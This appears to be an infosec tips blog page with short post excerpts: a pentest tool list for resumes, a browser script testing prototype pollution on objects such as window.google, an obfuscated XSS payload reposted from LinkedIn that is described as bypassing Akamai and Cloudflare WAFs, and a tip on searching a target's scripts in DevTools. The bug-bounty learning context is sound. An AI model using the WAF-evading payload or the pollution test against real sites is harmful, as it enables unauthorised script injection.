Hackertips.today - Constantly learning and collaborating in an InfoSec world

Building Your InfoSec Resume? Here’s What You Should Know (and Learn): While reviewing over 30 job descriptions for penetration testing and cybersecurity roles, I compiled a list of the most frequently mentioned tools, technologies, and concepts that employers are looking for. If you're updating your resume or preparing for interviews, this list might help you focus your learning and training. * Important Note: Don’t just add these terms to your resume blindly. Take time to understand how the tools work — even if you haven't administered Tenable Nessus scan templates for two years, you can still download demos, watch tutorials, or run labs to get real experience and speak confidently about the technology. [*] Top Vulnerability Assessment / Pentesting Tools Burp Suite (Community or Enterprise) Tenable Nessus (Check their site — many products) Qualys Fortify on Demand (FoD) WebInspect Enterprise (WIE) Metasploit Nmap [*] Security-Focused Operating Systems Kali Linux Parrot OS Bac...

  (() => {   const ArrayOfInterestingObjects = ['google', 'gapi', 'gadgets', 'ga'];   // Malicious payload to test prototype pollution   const maliciousPayload = JSON.parse('{"__proto__": {"polluted": "XSS!"}}');   const pollutionResults = [];   ArrayOfInterestingObjects.forEach((key) => {     const target = window[key];     if (!target) {       console.warn(`window.${key} does not exist.`);       pollutionResults.push({         key,         exists: false,         polluted: false,         reason: 'Object does not exist',       });       return;     }     console.log(`Inspecting window.${key}:`, target);     try {       Object.assign(target, maliciousPayload);       const wasPolluted = {}.polluted === 'XSS!';       pollut...

Just found this on LinkedIn - Props goes to Amit for the post AMIT BHAKAR AMIT BHAKAR   • 2nd Verified • 2nd Cyber Security Researcher || Bug Bounty Hunter || Penetration Tester || Ethical Hacker|| Cyber Security Researcher || Bug Bounty Hunter || Penetration Tester || Ethical Hacker|| 1d • 1 day ago • Visible to anyone on or off LinkedIn Pending You have already invited AMIT BHAKAR Bug Bounty tips 👀 New WAF Bypass Discovered - Akamai & Cloudflare 🔥 Original Post Link: https://www.linkedin.com/feed/update/urn:li:activity:7364263906405441537/ A fresh technique has been spotted that successfully bypasses WAFs like Akamai and Cloudflare. Payload -  <address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address...

How to enumerate your web app (target) easily for certain keywords - Load target - any browser pretty much right click inspect Once opened goto Sources tab -> On the left make sure "Page" is selected (not content scripts) -> right click "top" (right under the page icon you picked) -> Type in API for instance and hit ENTER You should see output like you see in the picture below, the browser will search all relevant scripts and info in the source that matches and tell you where it matched those keywords. Hackertips today